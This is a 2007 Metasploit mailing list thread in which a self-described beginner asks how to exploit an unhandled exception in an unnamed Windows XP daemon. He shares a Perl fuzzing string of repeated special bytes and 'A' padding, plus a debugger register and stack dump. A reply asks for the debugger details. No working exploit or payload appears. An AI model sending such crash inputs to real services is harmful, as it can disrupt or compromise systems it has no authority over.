Metasploit mailing list archives
How to exploit unhandled exception
From: thomas.werth at vahle.de (Thomas Werth)
Date: Mon, 12 Feb 2007 11:46:52 +0100
I send this data to the app:

$attackstring = "A" ;
$attackstring .= "\x0a";
$attackstring .= "\x11\x12\x20\x25\x05" x 5;
$attackstring .= "A" x 5000; #320;

Sometimes it is needed to send the data twice. When the debugger stops, address 0x727F1FC2 is given with an unhandled exception. Here is the register information:

EAX 007EA58C --->
Stack[00000A04]:007EA58C db 63h ; c
Stack[00000A04]:007EA58D db 73h ; s
Stack[00000A04]:007EA58E db 6Dh ; m
Stack[00000A04]:007EA58F db 0E0h ; ?
Stack[00000A04]:007EA590 db 1
Stack[00000A04]:007EA591 db 0
Stack[00000A04]:007EA592 db 0
Stack[00000A04]:007EA593 db 0
Stack[00000A04]:007EA594 db 0
Stack[00000A04]:007EA595 db 0
Stack[00000A04]:007EA596 db 0
Stack[00000A04]:007EA597 db 0
Stack[00000A04]:007EA598 db 5Bh ; [
Stack[00000A04]:007EA599 db 2Ah ; *
Stack[00000A04]:007EA59A db 81h ; ? <---

EBX 727F8E5B -> mfc42u.dll:727F8E5B call near ptr mfc42u_1258
ECX 0
EDC 0000003
ESI 0
EDI 77BFC407 -> msvcrt.dll:77BFC407 msvcrt_malloc db 8Bh

EBP 007EA630 --------->
Stack[00000A04]:007EA630 db 12h
Stack[00000A04]:007EA631 db 11h
Stack[00000A04]:007EA632 db 0Ah
Stack[00000A04]:007EA633 db 41h ; A
Stack[00000A04]:007EA634 db 60h ; `
Stack[00000A04]:007EA635 db 8Eh ; ?
Stack[00000A04]:007EA636 db 7Fh ;
Stack[00000A04]:007EA637 db 72h ; r
Stack[00000A04]:007EA638 db 41h ; A
Stack[00000A04]:007EA639 db 43h ; C
Stack[00000A04]:007EA63A db 7Ah ; z
Stack[00000A04]:007EA63B db 72h ; r
Stack[00000A04]:007EA63C db 12h
Stack[00000A04]:007EA63D db 11h <-------------------------

ESP 007EA62C ---------->
Stack[00000A04]:007EA630 db 12h
Stack[00000A04]:007EA631 db 11h
Stack[00000A04]:007EA632 db 0Ah
Stack[00000A04]:007EA633 db 41h ; A
Stack[00000A04]:007EA634 db 60h ; `
Stack[00000A04]:007EA635 db 8Eh ; ?
Stack[00000A04]:007EA636 db 7Fh ;
Stack[00000A04]:007EA637 db 72h ; r
Stack[00000A04]:007EA638 db 41h ; A
Stack[00000A04]:007EA639 db 43h ; C
Stack[00000A04]:007EA63A db 7Ah ; z
Stack[00000A04]:007EA63B db 72h ; r <-----------

EIP 727F1FC3 -> mfc42u.dll:727F1FC3 db 0CCh // above and behind even more 0CCh

Let me know what more information is needed. Waiting for your hints ;)

mmiller at hick.org wrote:
> Can you paste some of the information from the debugger about the unhandled exception? It's hard to answer the question generically, as it really depends on what type of exception you're triggering and how the data you're sending relates to the exception that is generated.
>
> On Mon, Feb 12, 2007 at 08:11:45AM +0100, Thomas Werth wrote:
>> Hello,
>> I poked around a bit with a daemon service on XP. When sending special chars, the attached debugger stops and reports an unhandled exception. As I'm new to exploit writing (well, I manage to write exploits for buffer overflows), I don't know how to get control of the daemon app using an unhandled exception. How do I do this? Where can I find examples for exploiting this kind of exception?
>> thx
>> Thomas
Current thread:
- How to exploit unhandled exception Thomas Werth (Feb 11)
- How to exploit unhandled exception mmiller at hick.org (Feb 11)
- How to exploit unhandled exception Thomas Werth (Feb 12)
- How to exploit unhandled exception mmiller at hick.org (Feb 12)
- How to exploit unhandled exception Thomas Werth (Feb 12)
- How to exploit unhandled exception mmiller at hick.org (Feb 11)